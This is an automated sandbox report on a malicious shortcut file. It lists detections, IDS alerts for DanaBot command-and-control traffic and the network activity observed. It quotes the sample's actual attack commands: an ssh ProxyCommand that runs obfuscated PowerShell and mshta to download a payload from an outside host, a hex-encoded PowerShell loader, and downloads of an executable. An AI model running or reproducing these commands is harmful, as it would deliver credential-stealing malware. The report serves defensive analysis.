          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" ., ProcessId: 7536, ProcessName: ssh.exe
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Local\Temp\r.bat
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44), CommandLine: powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 7536, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44), ProcessId: 7636, ProcessName: powershell.exe
          Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D2
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6072, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-27T08:49:04.226160+010020344651Malware Command and Control Activity Detected192.168.2.1049921188.132.183.159443TCP
          2024-12-27T08:49:05.724839+010020344651Malware Command and Control Activity Detected192.168.2.1049923206.206.125.221443TCP
          2024-12-27T08:49:06.820784+010020344651Malware Command and Control Activity Detected192.168.2.104992894.131.118.216443TCP
          2024-12-27T08:49:07.914994+010020344651Malware Command and Control Activity Detected192.168.2.1049930188.132.183.159443TCP
          2024-12-27T08:49:15.920356+010020344651Malware Command and Control Activity Detected192.168.2.1049954188.132.183.159443TCP
          2024-12-27T08:49:17.921127+010020344651Malware Command and Control Activity Detected192.168.2.1049958206.206.125.221443TCP
          2024-12-27T08:49:19.059297+010020344651Malware Command and Control Activity Detected192.168.2.104996194.131.118.216443TCP
          2024-12-27T08:49:20.528519+010020344651Malware Command and Control Activity Detected192.168.2.1049967188.132.183.159443TCP
          2024-12-27T08:49:26.108959+010020344651Malware Command and Control Activity Detected192.168.2.1049983188.132.183.159443TCP
          2024-12-27T08:49:26.209320+010020344651Malware Command and Control Activity Detected192.168.2.1049984206.206.125.221443TCP
          2024-12-27T08:49:26.353449+010020344651Malware Command and Control Activity Detected192.168.2.104998594.131.118.216443TCP
          2024-12-27T08:49:26.478397+010020344651Malware Command and Control Activity Detected192.168.2.1049987188.132.183.159443TCP
          2024-12-27T08:49:37.474876+010020344651Malware Command and Control Activity Detected192.168.2.1050015188.132.183.159443TCP
          2024-12-27T08:49:39.467654+010020344651Malware Command and Control Activity Detected192.168.2.1050021206.206.125.221443TCP
          2024-12-27T08:49:41.358375+010020344651Malware Command and Control Activity Detected192.168.2.105002794.131.118.216443TCP
          2024-12-27T08:49:43.365644+010020344651Malware Command and Control Activity Detected192.168.2.1050029188.132.183.159443TCP
          2024-12-27T08:49:46.900369+010020344651Malware Command and Control Activity Detected192.168.2.1050034188.132.183.159443TCP
          2024-12-27T08:49:49.605669+010020344651Malware Command and Control Activity Detected192.168.2.1050035206.206.125.221443TCP
          2024-12-27T08:49:51.490399+010020344651Malware Command and Control Activity Detected192.168.2.105003694.131.118.216443TCP
          2024-12-27T08:49:53.852487+010020344651Malware Command and Control Activity Detected192.168.2.1050037188.132.183.159443TCP
          2024-12-27T08:50:05.277636+010020344651Malware Command and Control Activity Detected192.168.2.1050042188.132.183.159443TCP
          2024-12-27T08:50:05.898036+010020344651Malware Command and Control Activity Detected192.168.2.1050043206.206.125.221443TCP
          2024-12-27T08:50:06.002098+010020344651Malware Command and Control Activity Detected192.168.2.105004494.131.118.216443TCP
          2024-12-27T08:50:06.102406+010020344651Malware Command and Control Activity Detected192.168.2.1050045188.132.183.159443TCP
          2024-12-27T08:50:18.932612+010020344651Malware Command and Control Activity Detected192.168.2.1050050188.132.183.159443TCP
          2024-12-27T08:50:21.712694+010020344651Malware Command and Control Activity Detected192.168.2.1050051206.206.125.221443TCP
          2024-12-27T08:50:24.018424+010020344651Malware Command and Control Activity Detected192.168.2.105005294.131.118.216443TCP
          2024-12-27T08:50:26.181397+010020344651Malware Command and Control Activity Detected192.168.2.1050053188.132.183.159443TCP
          2024-12-27T08:50:30.753848+010020344651Malware Command and Control Activity Detected192.168.2.1050058188.132.183.159443TCP
          2024-12-27T08:50:33.064608+010020344651Malware Command and Control Activity Detected192.168.2.1050059206.206.125.221443TCP
          2024-12-27T08:50:36.378759+010020344651Malware Command and Control Activity Detected192.168.2.105006094.131.118.216443TCP
          2024-12-27T08:50:38.641377+010020344651Malware Command and Control Activity Detected192.168.2.1050061188.132.183.159443TCP
          2024-12-27T08:50:51.338961+010020344651Malware Command and Control Activity Detected192.168.2.1050066188.132.183.159443TCP
          2024-12-27T08:50:51.414710+010020344651Malware Command and Control Activity Detected192.168.2.1050067206.206.125.221443TCP
          2024-12-27T08:50:51.497493+010020344651Malware Command and Control Activity Detected192.168.2.105006894.131.118.216443TCP
          2024-12-27T08:50:51.571723+010020344651Malware Command and Control Activity Detected192.168.2.1050069188.132.183.159443TCP
          2024-12-27T08:51:07.506464+010020344651Malware Command and Control Activity Detected192.168.2.1050074188.132.183.159443TCP
          2024-12-27T08:51:10.128528+010020344651Malware Command and Control Activity Detected192.168.2.1050075206.206.125.221443TCP
          2024-12-27T08:51:12.766473+010020344651Malware Command and Control Activity Detected192.168.2.105007694.131.118.216443TCP
          2024-12-27T08:51:14.910033+010020344651Malware Command and Control Activity Detected192.168.2.1050077188.132.183.159443TCP
          2024-12-27T08:51:18.894398+010020344651Malware Command and Control Activity Detected192.168.2.1050082188.132.183.159443TCP
          2024-12-27T08:51:22.212063+010020344651Malware Command and Control Activity Detected192.168.2.1050083206.206.125.221443TCP
          2024-12-27T08:51:25.278106+010020344651Malware Command and Control Activity Detected192.168.2.105008494.131.118.216443TCP
          2024-12-27T08:51:28.352672+010020344651Malware Command and Control Activity Detected192.168.2.1050085188.132.183.159443TCP
          2024-12-27T08:51:49.222393+010020344651Malware Command and Control Activity Detected192.168.2.1050090188.132.183.159443TCP
          2024-12-27T08:51:49.274931+010020344651Malware Command and Control Activity Detected192.168.2.1050091206.206.125.221443TCP
          2024-12-27T08:51:49.324518+010020344651Malware Command and Control Activity Detected192.168.2.105009294.131.118.216443TCP
          2024-12-27T08:51:49.380085+010020344651Malware Command and Control Activity Detected192.168.2.1050093188.132.183.159443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-27T08:47:51.466422+010028033053Unknown Traffic192.168.2.1049741150.241.97.10443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Roaming\mama.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\mama.exeReversingLabs: Detection: 71%
          Multi AV Scanner detection for submitted file
          Source: vreFmptfUu.lnkReversingLabs: Detection: 36%
          Source: vreFmptfUu.lnkVirustotal: Detection: 39%Perma Link
          Yara detected DanaBot stealer dll
          Source: Yara matchFile source: 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mama.exe PID: 8756, type: MEMORYSTR
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\mama.exeJoe Sandbox ML: detected
          Source: unknownHTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.10:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.10:49728 version: TLS 1.2
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_02F7E190 FindFirstFileW,FindClose,43_2_02F7E190
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_02F7DBC4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,43_2_02F7DBC4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49928 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49967 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49983 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49961 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49987 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49954 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49985 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50015 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50029 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50021 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50027 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50034 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50037 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50036 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50052 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50059 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50045 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50043 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50051 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50053 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50035 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50067 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50066 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50083 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50069 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50060 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50077 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50090 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50085 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50092 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50042 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50076 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50082 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49921 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50091 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50061 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49923 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50050 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50075 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49930 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50044 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50068 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49958 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49984 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50058 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50093 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50074 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50084 -> 94.131.118.216:443
          Source: global trafficHTTP traffic detected: GET /ggg.pdf HTTP/1.1Host: pravo-bashkortostan.ruConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /mama.exe HTTP/1.1Host: pravo-bashkortostan.ru
          Source: Joe Sandbox ViewASN Name: PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR
          Source: Joe Sandbox ViewASN Name: HYPEENT-SJUS HYPEENT-SJUS
          Source: Joe Sandbox ViewASN Name: NASSIST-ASGI NASSIST-ASGI
          Source: Joe Sandbox ViewASN Name: TECNALIAES TECNALIAES
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49741 -> 150.241.97.10:443
          Source: global trafficHTTP traffic detected: GET /aaa.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pravo-bashkortostan.ruConnection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: global trafficHTTP traffic detected: GET /aaa.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pravo-bashkortostan.ruConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ggg.pdf HTTP/1.1Host: pravo-bashkortostan.ruConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /mama.exe HTTP/1.1Host: pravo-bashkortostan.ru
          Source: global trafficDNS traffic detected: DNS query: pravo-bashkortostan.ru
          Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
          Source: mama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
          Source: mama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
          Source: svchost.exe, 0000000C.00000002.2967458082.000001A414EB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: svchost.exe, 0000000C.00000003.1321844798.000001A414CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: mama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
          Source: powershell.exe, 0000000D.00000002.1575592646.00000267C1626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 0000000D.00000002.1538124401.00000267B17DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 0000000D.00000002.1538124401.00000267B34B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pravo-bashkortostan.ru
